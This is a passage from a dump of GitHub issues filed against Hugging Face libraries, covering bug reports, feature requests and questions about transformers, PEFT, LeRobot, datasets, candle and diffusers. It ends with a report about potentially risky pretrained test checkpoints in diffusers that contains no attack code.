the United States?\\n\\n\"\n \"Now it's your turn:\\n\"\n \"Q: Who is the president of the United States?\\n\"\n \"A: The current president of the United States is Donald Trump.\\n\"\n \"Q: When was he elected?\\n\"\n )},\n {'role': 'assistant', 'content': 'Rewrite: '}]\n\n# construct predictor\npred = HuggingFacePredictor(endpoint_name=my_endpoint_name, sagemaker_session=get_my_sagemaker_session())\n\n# render the messages to a string\ntok = AutoTokenizer.from_pretrained(setup_params.llm_name)\nrendered_messages = tok.apply_chat_template(prompt.messages.model_dump(), tokenize=False,\n add_generation_prompt=False, continue_final_message=True)\n\n# invoke the predictor\nresp = pred.predict({\"inputs\": rendered_messages})\n``` \nThe response 
is\n```python\n[{'generated_text': \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\\n\\nCutting Knowledge Date: December 2023\\nToday Date: 26 Jul 2024\\n\\n<|eot_id|><|start_header_id|>user<|end_header_id|>\\n\\nWho is the president of the United States?<|eot_id|><|start_header_id|>assistant<|end_header_id|>\\n\\nThe current president of the United States is Donald Trump.<|eot_id|><|start_header_id|>user<|end_header_id|>\\n\\nYour task is to rewrite the given question in a context independent manner.\\nHere are some examples:\\n\\nExample 1:\\nQ: What is the capital of France?\\nA: Paris?\\nQ: How many people live there?\\nRewrite: How many people live in Paris?\\n\\nExample 2:\\nQ: Do I need a visa to travel to the United States?\\nA: Yes, you need a visa to travel to the United States.\\nQ: What is the process to get a visa?\\nRewrite: What is the process to get a visa for the United States?\\n\\nNow it's your turn:\\nQ: Who is the president of the United States?\\nA: The current president of the United States is Donald Trump.\\nQ: When was he elected?<|eot_id|><|start_header_id|>assistant<|end_header_id|>\\n\\nRewrite: When was Donald Trump elected?\"}]\n```\nNote, that the suffix after the \"Rewrite: \" is reasonable - it's the re-written query to be context independent.\n\nWhen using message-api directly, I get something radically different:\n```python\npred.predict({\"messages\": message_dict})\n```\nthe output is:\n```\n{'object': 'chat.completion',\n 'id': '',\n 'created': 1750919575,\n 'model': 'meta-llama/Llama-3.3-70B-Instruct',\n 'system_fingerprint': '3.2.3-sha-a1f3ebe',\n 'choices': [{'index': 0,\n 'message': {'role': 'assistant',\n 'content': ' What is the process to get a visa to travel to the United States?\\n\\nHere is the given question: \\nWho is the president of the United States?\\n\\nSo the response to the question would be: \\nThe current president of the United States is Joe Biden.\\n\\nQ: How long has he been in office?\\nRewrite: How long has Joe Biden been in office?'},\n 'logprobs': None,\n 'finish_reason': 'stop'}],\n 'usage': ", "url": "https://github.com/huggingface/text-generation-inference/issues/3277", "state": "open", "labels": [], "created_at": "2025-06-26T06:49:31Z", "updated_at": "2025-06-26T06:56:22Z", "comments": 0, "user": "alexshtf" }, { "repo": "huggingface/peft", "number": 2615, "title": "How can I fine-tune the linear layers of the LLM part in Qwen2.5_VL 3B?", "body": "I only want to fine-tune the linear layers in the LLM part of Qwen2.5_VL 3B. 
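(Update: one workaround that seems to work is to pass `target_modules` as a single regex string — when it is a plain string rather than a list, PEFT full-matches it as a regex, so a pattern anchored to the language-model prefix will never match `visual.blocks.*`. A sketch, assuming the text layers live under `model.layers.` as in the weight index below; on newer transformers the prefix may be `model.language_model.layers.` instead:)\n\n```python\nfrom peft import LoraConfig\n\n# regex instead of a list: only the LLM stack matches, the vision tower never does\nlora_config = LoraConfig(\n    r=16,  # hypothetical rank, use your own\n    lora_alpha=32,\n    target_modules=r\"model\\.layers\\.\\d+\\.(self_attn\\.(q|k|v|o)_proj|mlp\\.(gate|up|down)_proj)\",\n)\n```\n\n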
The LoRA target modules are as follows:\n```\ntarget_modules: List[str] = field(default_factory=lambda: [ \n 'self_attn.q_proj',\n 'self_attn.k_proj',\n 'self_attn.v_proj',\n 'self_attn.o_proj',\n 'mlp.gate_proj',\n 'mlp.up_proj',\n 'mlp.down_proj',\n])\n```\nHowever, there's an issue: the vision encoder part of Qwen2.5_VL 3B also contains modules named `mlp.gate_proj`, `mlp.up_proj`, and `mlp.down_proj`, as shown here:\n\n```\n\"visual.blocks.0.mlp.down_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.down_proj.weight\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.gate_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.gate_proj.weight\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.up_proj.bias\": \"model-00001-of-00002.safetensors\",\n\"visual.blocks.0.mlp.up_proj.weight\": \"model-00001-of-00002.safetensors\",\n```\nThis causes the `mlp.gate_proj`, `mlp.up_proj`, and `mlp.down_proj` in the vision encoder to also be involved in the fine-tuning. \n\nFor example, the 31st block is as follows:\n```\nvisual.blocks.31.mlp.gate_proj.lora_A.default.weight\nvisual.blocks.31.mlp.gate_proj.lora_B.default.weight\nvisual.blocks.31.mlp.up_proj.lora_A.default.weight\nvisual.blocks.31.mlp.up_proj.lora_B.default.weight\nvisual.blocks.31.mlp.down_proj.lora_A.default.weight\nvisual.blocks.31.mlp.down_proj.lora_B.default.weight\n```\n\nFinally, I only want to fine-tune the linear layers in the LLM part of Qwen2.5_VL 3B, How can I resolve this? Thank you!\n\n\n", "url": "https://github.com/huggingface/peft/issues/2615", "state": "closed", "labels": [], "created_at": "2025-06-26T02:08:43Z", "updated_at": "2025-07-18T16:04:27Z", "comments": 7, "user": "guoguo1314" }, { "repo": "huggingface/lerobot", "number": 1383, "title": "Can multiple Lerobot datasets be mixed to pre-train a VLA model?", "body": "Hello, I would like to know if multiple independent Lerobot datasets can be mixed to achieve large-scale pre-training of a VLA model. Just like OpenVLA, it can mix multiple RLDS datasets to pre-train models.", "url": "https://github.com/huggingface/lerobot/issues/1383", "state": "open", "labels": [ "enhancement", "question", "dataset" ], "created_at": "2025-06-25T08:45:48Z", "updated_at": "2025-08-12T09:55:48Z", "user": "xliu0105" }, { "repo": "huggingface/transformers", "number": 39023, "title": "Does Gemma 3 need positions ids to be 1-indexed explicitly?", "body": "Hi Team\n\nAt some point `Gemma3ForConditionalGeneration` used to impose a 1-indexing of `position_ids`, [see here](https://github.com/huggingface/transformers/blob/cf8091c017533c03be73b84ab535ae9c80924796/src/transformers/models/gemma3/modeling_gemma3.py#L1430). 
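(For concreteness, my reading of the linked line is that positions were simply shifted by one — roughly this sketch, with `seq_len`/`input_ids` standing in for the real variables:)\n\n```python\n# my paraphrase of the old behavior: 1-indexed instead of 0-indexed positions\nposition_ids = torch.arange(seq_len, device=input_ids.device).unsqueeze(0) + 1\n```\n\n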
However, you won't find this in the latest main anymore, [see here](https://github.com/huggingface/transformers/blob/cf8091c017533c03be73b84ab535ae9c80924796/src/transformers/models/gemma3/modeling_gemma3.py#L1430). I know there is some overwriting of position ids taking place, but I wanted to know if it's the same 1-index conversion.\n\nDoes `Gemma3ForConditionalGeneration` still need 1-indexed position ids, and if so, do I need to do that manually before passing custom position ids?", "url": "https://github.com/huggingface/transformers/issues/39023", "state": "closed", "labels": [], "created_at": "2025-06-25T00:00:14Z", "updated_at": "2025-07-25T17:27:26Z", "comments": 2, "user": "krypticmouse" }, { "repo": "huggingface/transformers", "number": 39017, "title": "Not able to use flash attention with torch.compile with model like BERT", "body": "### System Info\n\nWhen using torch.compile with a model like BERT, the attention mask gets set to a non-null value in the following function in `src/transformers/modeling_attn_mask_utils.py`. Flash attention does not support a non-null attention mask ([source](https://github.com/pytorch/pytorch/blob/b09bd414a6ccba158c09f586a278051588d90936/aten/src/ATen/native/transformers/sdp_utils_cpp.h#L261)).\n\n\n```python\ndef _prepare_4d_attention_mask_for_sdpa(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):\n    \"\"\"\n    Creates a non-causal 4D mask of shape `(batch_size, 1, query_length, key_value_length)` from a 2D mask of shape\n    `(batch_size, key_value_length)`\n\n    Args:\n        mask (`torch.Tensor`):\n            A 2D attention mask of shape `(batch_size, key_value_length)`\n        dtype (`torch.dtype`):\n            The torch dtype the created mask shall have.\n        tgt_len (`int`):\n            The target length or query length the created mask shall have.\n    \"\"\"\n    _, key_value_length = mask.shape\n    tgt_len = tgt_len if tgt_len is not None else key_value_length\n\n    is_tracing = torch.jit.is_tracing() or isinstance(mask, torch.fx.Proxy) or is_torchdynamo_compiling()\n\n    # torch.jit.trace, symbolic_trace and torchdynamo with fullgraph=True are unable to capture data-dependent controlflows.\n    if not is_tracing and torch.all(mask == 1):\n        return None\n    else:\n        return AttentionMaskConverter._expand_mask(mask=mask, dtype=dtype, tgt_len=tgt_len)\n```\n\nIs there a proper way to bypass this for BERT when using torch.compile (fullgraph=False)?\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nScript to repro:\n\n```python\nimport torch, transformers, torch.profiler as tp\n\ncfg = transformers.BertConfig.from_pretrained(\n    \"bert-base-uncased\",\n    attn_implementation=\"sdpa\",  # opt-in to HF's SDPA path\n    output_attentions=False,\n    attention_probs_dropout_prob=0.0  # turn off dropout (Flash limit)\n)\nm = transformers.BertModel(cfg).eval().to(\"cuda\", torch.float16)\n\ntok = transformers.BertTokenizer.from_pretrained(\"bert-base-uncased\")\ninputs = tok(\"hello world\", return_tensors=\"pt\").to(\"cuda\")\n# keep the all-ones mask that the tokenizer created\n\ncompiled = torch.compile(m, fullgraph=False)  # fullgraph=True behaves the same\n\nwith tp.profile(\n    activities=[tp.ProfilerActivity.CUDA],  # <- keyword!\n    record_shapes=False  # any other kwargs you need\n) as prof:\n    compiled(**inputs)\n\nprint(\"Flash kernel present?\",\n      
any(\"flash_attention\" in k.name for k in prof.key_averages()))\n```\n\n### Expected behavior\n\nI was expecting it to print the following, indicating its using flash attention kernels.\n\n`Flash kernel present? True`", "url": "https://github.com/huggingface/transformers/issues/39017", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-24T19:09:07Z", "updated_at": "2025-10-09T23:03:45Z", "comments": 3, "user": "gambiTarun" }, { "repo": "huggingface/lerobot", "number": 1379, "title": "New motor configuration doesn't center servo motors for so100", "body": "I was used to using the previously existing `configure_motor.py` script to set the baudrate, ID and center the servo. And I used to do this before attempting assembly.\n\nThis script was also useful for configuring individual motors whenever I had to replace one in case they brok for some reason.\n\nI just pulled the latest version of lerobot and found that script is gone and replaced by one that expects me to configure every motor sequentially, which is annoying.\n\nFurthermore it doesn't center the servo anymore, instead it just sets the homing offset. This makes it possible for someone to have the motor at one of the limits, assemble the robot that way and not actually be able to move it (or have its motion limited). Essentially this new setup seems more prone to user error, especially because it doesn't mention any of these issues in the assembly process.\n\nAlso older users are now not able to center the servo with any script.", "url": "https://github.com/huggingface/lerobot/issues/1379", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-24T15:43:16Z", "updated_at": "2025-08-12T09:56:02Z", "user": "Esser50K" }, { "repo": "huggingface/datasets", "number": 7637, "title": "Introduce subset_name as an alias of config_name", "body": "### Feature request\n\nAdd support for `subset_name` as an alias for `config_name` in the datasets library and related tools (such as loading scripts, documentation, and metadata).\n\n### Motivation\n\nThe Hugging Face Hub dataset viewer displays a column named **\"Subset\"**, which refers to what is currently technically called config_name in the datasets library. This inconsistency has caused confusion for many users, especially those unfamiliar with the internal terminology.\n\nI have repeatedly received questions from users trying to understand what \"config\" means, and why it doesn\u2019t match what they see as \"subset\" on the Hub. 
Renaming everything to `subset_name` might be too disruptive, but introducing subset_name as a clear alias for config_name could significantly improve user experience without breaking backward compatibility.\n\nThis change would:\n- Align terminology across the Hub UI and datasets codebase\n- Reduce user confusion, especially for newcomers\n- Make documentation and examples more intuitive\n", "url": "https://github.com/huggingface/datasets/issues/7637", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-06-24T12:49:01Z", "updated_at": "2025-07-01T16:08:33Z", "comments": 4, "user": "albertvillanova" }, { "repo": "huggingface/candle", "number": 3003, "title": "Build for multiple arch?", "body": "CUDA_COMPUTE_CAP=\"90,100,121\" ??", "url": "https://github.com/huggingface/candle/issues/3003", "state": "open", "labels": [], "created_at": "2025-06-23T13:17:45Z", "updated_at": "2025-06-23T13:17:45Z", "comments": 0, "user": "johnnynunez" }, { "repo": "huggingface/transformers", "number": 38984, "title": "QA pipeline prediction generates wrong response when `top_k` param > 1", "body": "### System Info\n\n- `transformers` version: 4.53.0.dev0\n- Platform: Linux-5.4.0-1128-aws-fips-x86_64-with-glibc2.31\n- Python version: 3.11.11\n- Huggingface_hub version: 0.33.0\n- Safetensors version: 0.5.3\n- Accelerate version: 1.8.1\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu126 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nimport transformers\n\narchitecture = \"csarron/mobilebert-uncased-squad-v2\"\ntokenizer = transformers.AutoTokenizer.from_pretrained(architecture, low_cpu_mem_usage=True)\nmodel = transformers.MobileBertForQuestionAnswering.from_pretrained(\n architecture, low_cpu_mem_usage=True\n)\npipeline = transformers.pipeline(task=\"question-answering\", model=model, tokenizer=tokenizer)\n\n\ndata = [\n {'question': ['What color is it?', 'How do the people go?', \"What does the 'wolf' howl at?\"],\n 'context': [\n \"Some people said it was green but I know that it's pink.\",\n 'The people on the bus go up and down. 
Up and down.',\n \"The pack of 'wolves' stood on the cliff and a 'lone wolf' howled at the moon for hours.\"\n ]}\n]\n\n# prediction result is wrong\npipeline(data, top_k=2, max_answer_len=5)\n```\n### Expected behavior\n\nExpected prediction response:\n\n```\n[[{'score': 0.5683297514915466, 'start': 51, 'end': 55, 'answer': 'pink'}, {'score': 0.028800610452890396, 'start': 51, 'end': 56, 'answer': 'pink.'}], [{'score': 0.3008899986743927, 'start': 25, 'end': 36, 'answer': 'up and down'}, {'score': 0.12070021033287048, 'start': 38, 'end': 49, 'answer': 'Up and down'}], [{'score': 0.8356598615646362, 'start': 68, 'end': 76, 'answer': 'the moon'}, {'score': 0.0971309095621109, 'start': 72, 'end': 76, 'answer': 'moon'}]]\n```\nBut it gets the following response (**one 'Up and down' answer is missing** )\n\n```\n[[{'score': 0.5683297514915466, 'start': 51, 'end': 55, 'answer': 'pink'}, {'score': 0.028800610452890396, 'start': 51, 'end': 56, 'answer': 'pink.'}], {'score': 0.4215902090072632, 'start': 25, 'end': 36, 'answer': 'up and down'}, [{'score': 0.8356598615646362, 'start': 68, 'end': 76, 'answer': 'the moon'}, {'score': 0.0971309095621109, 'start': 72, 'end': 76, 'answer': 'moon'}]]\n```", "url": "https://github.com/huggingface/transformers/issues/38984", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-23T13:09:23Z", "updated_at": "2025-07-17T08:24:31Z", "comments": 4, "user": "WeichenXu123" }, { "repo": "huggingface/lighteval", "number": 822, "title": "Documenting how to launch multilingual tasks", "body": "Atm, need to use custom tasks to launch them, must be documented", "url": "https://github.com/huggingface/lighteval/issues/822", "state": "open", "labels": [], "created_at": "2025-06-23T11:10:13Z", "updated_at": "2025-09-03T15:28:42Z", "user": "clefourrier" }, { "repo": "huggingface/candle", "number": 3002, "title": "Is there a roadmap or intention to support CUDA Graph?", "body": "vLLM v1 uses CUDA Graph to capture the execution workflow of the entire model, resulting in significant performance improvements compared to the previous version. I'm wondering if there are any plans to support CUDA Graph in Candle. Would it be possible to add `start_capture`, `end_capture`, and `replay` to the `Module` so that the captured graph can be replayed within the forward method? @LaurentMazare \n\nEric may also be interested in this @EricLBuehler ", "url": "https://github.com/huggingface/candle/issues/3002", "state": "open", "labels": [], "created_at": "2025-06-23T10:11:12Z", "updated_at": "2025-09-06T14:04:53Z", "comments": 4, "user": "guoqingbao" }, { "repo": "huggingface/transformers", "number": 38977, "title": "LMHead is processing redundant tokens in prefill", "body": "While using `GPT2LMHeadModel.generate()` and compare its performance with vLLM, I noticed a significant inefficiency in the `forward()` implementation of many huggingface models. For example, in the `GPT2LMHeadModel.forward`, `self.lm_head` is applied to all token hidden states, even when called from the `generate()` method, where only the logits of the last token are needed for next-token prediction. 
This computes logits over the entire sequence and can introduce significant overhead.\n\n```py\n# src/transformers/models/gpt2/modeling_gpt2.py, line 1233\nlm_logits = self.lm_head(hidden_states)\n```\n\nSuggested Fix: add a conditional branch in forward() to slice the hidden states before computing logits if it\u2019s a generation step.", "url": "https://github.com/huggingface/transformers/issues/38977", "state": "closed", "labels": [], "created_at": "2025-06-23T08:32:22Z", "updated_at": "2025-06-25T08:29:02Z", "comments": 3, "user": "null-pointer-access" }, { "repo": "huggingface/lerobot", "number": 1369, "title": "The performance of SmolVLA on LIBERO cannot be replicated", "body": "I trained SmolVLA from scratch on the LIBERO dataset (the LIBERO dataset under Lerobot), but during the test, I couldn't reproduce its results in the paper. Could there be a problem with my reproduction code or process? Could you produce a version of the reproduction tutorial?", "url": "https://github.com/huggingface/lerobot/issues/1369", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-23T07:38:52Z", "updated_at": "2025-10-07T19:58:50Z", "user": "hahans" }, { "repo": "huggingface/transformers", "number": 38970, "title": "Global and Local Anomaly co-Synthesis Strategy (GLASS)", "body": "### Model description\n\nHi \ud83e\udd17 Transformers team,\n\nI would like to contribute a new model to the library:\nGLASS \u2013 A Unified Anomaly Synthesis Strategy with Gradient Ascent for Industrial Anomaly Detection and Localization\n\n\ud83d\udcc4 Paper: https://arxiv.org/abs/2407.09359\n\n\ud83d\udcbb Code: https://github.com/cqylunlun/GLASS\n\nGLASS is a novel approach for industrial anomaly detection. It uses gradient ascent in the latent space to synthesize diverse and controllable anomalies, which improves both detection and localization. I believe this model could be valuable for users working on visual inspection and quality control tasks in manufacturing and related domains.\n\nWould the maintainers be interested in having this model integrated into Transformers? If so, I\u2019d be happy to start working on a PR.\n\nLooking forward to your feedback!\n\n### Open source status\n\n- [x] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/38970", "state": "closed", "labels": [ "New model" ], "created_at": "2025-06-22T12:28:19Z", "updated_at": "2025-06-23T20:55:16Z", "comments": 2, "user": "sbrzz" }, { "repo": "huggingface/smolagents", "number": 1467, "title": "How can I add prompt words in the most elegant way to make the final answer of agents in Chinese or all the reasoning text displayed on gradio in a specific language of a certain one", "body": "How can I add prompt words in the most elegant way to make the final answer of agents in Chinese or all the reasoning text displayed on gradio in a specific language of a certain one?", "url": "https://github.com/huggingface/smolagents/issues/1467", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-06-22T07:34:13Z", "updated_at": "2025-06-22T10:49:30Z", "user": "ShelterWFF" }, { "repo": "huggingface/transformers", "number": 38965, "title": "Modernbert implementation with Tensorflow", "body": "Hi all! 
\n I've noticed that ModernBERT [does not have an implementation in tensorflow](https://github.com/huggingface/transformers/issues/37128#issuecomment-2766235185) and I was looking into it. \n\nI'm checking this https://huggingface.co/docs/transformers/main/add_tensorflow_model and I noticed that it's talking about `modelling_modelname.py`, however at the head of the file `modeling_modernbert.py` there is a warning saying \n\n```\n# \ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\n# This file was automatically generated from src/transformers/models/modernbert/modular_modernbert.py.\n# Do NOT edit this file manually as any edits will be overwritten by the generation of\n# the file from the modular. If any change should be done, please apply the change to the\n# modular_modernbert.py file directly. One of our CI enforces this.\n# \ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\n# Copyright 2024 Answer.AI, LightOn, and contributors, and the HuggingFace Inc. team. All rights reserved.\n#\n```\n\nWhat does that means and is there any other implementation having the same principles? \n\n### Motivation\n\nI need Modernbert to work with [DeLFT](https://github.com/kermitt2/delft) through huggingface, and the implementation is mainly tensorflow there. \n\n### Your contribution\n\nI would like to propose a PR but I need a little bit of help in starting up. ", "url": "https://github.com/huggingface/transformers/issues/38965", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-06-21T18:52:50Z", "updated_at": "2025-06-23T15:17:50Z", "comments": 2, "user": "lfoppiano" }, { "repo": "huggingface/lerobot", "number": 1361, "title": "Nvidia Gr00t", "body": "Hi,\n\nAre there any plans to integrate Nvidia Gr00t policy?", "url": "https://github.com/huggingface/lerobot/issues/1361", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-06-21T10:42:07Z", "updated_at": "2025-08-20T13:34:30Z", "user": "AbdElRahmanFarhan" }, { "repo": "huggingface/lerobot", "number": 1360, "title": "Homing offset not taken into account during calibration", "body": "### System Info\n\n```Shell\nAs of lerobot commit `c940676bdda5ab92e3f9446a72fafca5c550b505`. 
Other system information is irrelevant for this issue.\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIn `lerobot/common/motors/feetech/feetech.py`:\n```python\n@property\ndef is_calibrated(self) -> bool:\n    motors_calibration = self.read_calibration()\n    if set(motors_calibration) != set(self.calibration):\n        return False\n\n    same_ranges = all(\n        self.calibration[motor].range_min == cal.range_min\n        and self.calibration[motor].range_max == cal.range_max\n        for motor, cal in motors_calibration.items()\n    )\n    if self.protocol_version == 1:\n        return same_ranges\n\n    same_offsets = all(\n        self.calibration[motor].homing_offset == cal.homing_offset\n        for motor, cal in motors_calibration.items()\n    )\n    return same_ranges and same_offsets\n```\n\nInstead of having:\n```python\nsame_offsets = all(\n    self.calibration[motor].homing_offset == cal.homing_offset\n    for motor, cal in motors_calibration.items()\n)\n```\nthe `homing_offset` should be used to adjust the offset in `range_min` and `range_max`. With the current implementation, if I disconnect the two robots from the power outlet and my USB hub and reconnect them afterwards, the `Min_Position_Limit`, `Max_Position_Limit` and `Homing_Offset` values change, forcing me to recalibrate each time since `same_offsets` and `same_ranges` are invalidated. \n\nThe reason I'm not doing this myself is that I don't have enough knowledge to make sure I don't physically break anything while trying to fix it (since I run the risk of having my motors go sideways).\n\n\n### Expected behavior\n\nI expect not to have to recalibrate each time I disconnect my SO-100 arms from the outlet.", "url": "https://github.com/huggingface/lerobot/issues/1360", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-21T01:28:04Z", "updated_at": "2025-08-12T09:57:27Z", "user": "godardt" }, { "repo": "huggingface/lerobot", "number": 1359, "title": "Not clear how to setup a basic interactive simulator demo", "body": "Before buying the real robot most people would want to run a visual, interactive demo in the simulator. \n\nA demo should provide: \n - A trained model on the Franka robot\n - an intuitive way to interact with the cube using the mouse (e.g. drag, move, or “kick” it around) so we can see the robot chasing the cube.\n\nMany thanks\n", "url": "https://github.com/huggingface/lerobot/issues/1359", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-06-20T14:12:17Z", "updated_at": "2025-10-09T21:49:19Z", "user": "aguaviva" }, { "repo": "huggingface/optimum", "number": 2300, "title": "Support for EuroBERT models", "body": "### Feature request\n\nI would like to export and optimize the [EuroBERT models](https://huggingface.co/collections/EuroBERT/eurobert-67ceb6c01804878b1f7999c6).\n\nCurrently, it doesn't seem to be possible. When I run:\n\n```python\nfrom optimum.onnxruntime import ORTModelForSequenceClassification\n\nonnx_model = ORTModelForSequenceClassification.from_pretrained(\n    \"EuroBERT/EuroBERT-210m\",\n    export=True,\n    trust_remote_code=True,\n)\n```\n\nHere is the output I got:\n```\nValueError: Trying to export a eurobert model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. 
Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type eurobert to be supported natively in the ONNX export.\n```\n\nEnvironment Specs:\n- Python Version: 3.11.10\n- Optimum Version: 1.26.1\n\nAre you planning to support these models? \n\n### Motivation\n\n[EuroBERT models](https://huggingface.co/collections/EuroBERT/eurobert-67ceb6c01804878b1f7999c6) are modern multilingual encoder models that work well when adapted to several multilingual tasks (classification, NER, retrieval...).\n\n### Your contribution\n\nI can try to add them if you are not planning to do it.", "url": "https://github.com/huggingface/optimum/issues/2300", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-20T12:35:46Z", "updated_at": "2025-08-21T02:11:39Z", "comments": 2, "user": "antonioloison" }, { "repo": "huggingface/peft", "number": 2601, "title": "How to Load Adapters with Per-Layer Variable Shapes in `PeftModel.from_pretrained`", "body": "### Feature request\n\nHi PEFT team,\n\nThank you for the great work on the PEFT library!\n\nI'm working on an extension to LoKrConfig that supports layer-wise adapters with different internal shapes. Specifically:\n\n- Each **adapter assigned to a layer** (e.g., adapter for layer A vs. layer B) may have a different shape.\n- These shapes are **fixed during training**, but vary across layers depending on, for example, the local hidden size or other heuristics.\n- For instance, the adapter weights might have shapes like `[2, 64, 64], [2, 64, 64]` for one layer and `[1, 86, 64], [1, 128, 64]` for another.\n\nThis creates a challenge at load time (`PeftModel.from_pretrained`), since the current mechanism assumes a uniform adapter shape derived from the config and pre-registers all adapter modules before loading weights.\n\nTo support such per-layer dynamic shapes, I see two possible approaches:\n\n1. **Record the shape of each layer\u2019s adapter in the config**, so that empty adapters can be registered with the correct shape before copying weights.\n2. **Bypass the current registration step**, and instead directly load the adapter weights, then dynamically construct and register the modules with the appropriate shape.\n\nMy questions:\n\n1. Is either of these approaches supported or recommended?\n2. What parts of the PEFT codebase need to be extended (e.g., config, adapter registration logic, loading flow)?\n3. 
Is there an existing workaround or prior art within PEFT for handling per-layer shape variation like this?\n\n\nThanks again for your work!\n\n### Your contribution\n\nI'd be happy to contribute a patch if this is a use case worth supporting more broadly.", "url": "https://github.com/huggingface/peft/issues/2601", "state": "closed", "labels": [], "created_at": "2025-06-20T11:11:19Z", "updated_at": "2025-06-21T05:42:58Z", "user": "yuxuan-z19" }, { "repo": "huggingface/diffusers", "number": 11762, "title": "Could you help fix the backdoor vulnerability caused by two risky pre-trained models used in this repo?", "body": "### Describe the bug\n\nHi, @patrickvonplaten, @sayakpaul, I'd like to report that two potentially risky pretrained models are being used in this project, which may pose **backdoor threats**. Please check the following code example:\n\n### Reproduction\n\n• **tests/pipelines/stable_diffusion/test_onnx_stable_diffusion_upscale.py**\n\n```python\nclass OnnxStableDiffusionUpscalePipelineFastTests(OnnxPipelineTesterMixin, unittest.TestCase):\n    # TODO: is there an appropriate internal test set?\n    hub_checkpoint = \"ssube/stable-diffusion-x4-upscaler-onnx\"\n```\n\n```python\ndef test_pipeline_default_ddpm(self):\n    pipe = OnnxStableDiffusionUpscalePipeline.from_pretrained(self.hub_checkpoint, provider=\"CPUExecutionProvider\")\n    pipe.set_progress_bar_config(disable=None)\n\n    inputs = self.get_dummy_inputs()\n    image = pipe(**inputs).images\n    image_slice = image[0, -3:, -3:, -1].flatten()\n```\n\n• **tests/pipelines/stable_diffusion/test_onnx_stable_diffusion_img2img.py**\n\n```python\nclass OnnxStableDiffusionImg2ImgPipelineFastTests(OnnxPipelineTesterMixin, unittest.TestCase):\n    hub_checkpoint = \"hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline\"\n```\n\n```python\ndef test_pipeline_default_ddim(self):\n    pipe = OnnxStableDiffusionImg2ImgPipeline.from_pretrained(self.hub_checkpoint, provider=\"CPUExecutionProvider\")\n    pipe.set_progress_bar_config(disable=None)\n\n    inputs = self.get_dummy_inputs()\n    image = pipe(**inputs).images\n    image_slice = image[0, -3:, -3:, -1].flatten()\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nOn Windows\n\n### Who can help?\n\n#### **Issue Description**\n\nAs shown above, in the **test_onnx_stable_diffusion_upscale.py** file, the model **\"ssube/stable-diffusion-x4-upscaler-onnx\"** is used as the default model parameter in the `from_pretrained()` method of the `OnnxStableDiffusionUpscalePipeline` class in the diffusers library. Running the relevant instance method will automatically download and load this model. Later, the `pipe(**input)` method is used to execute the model. Similarly, in the 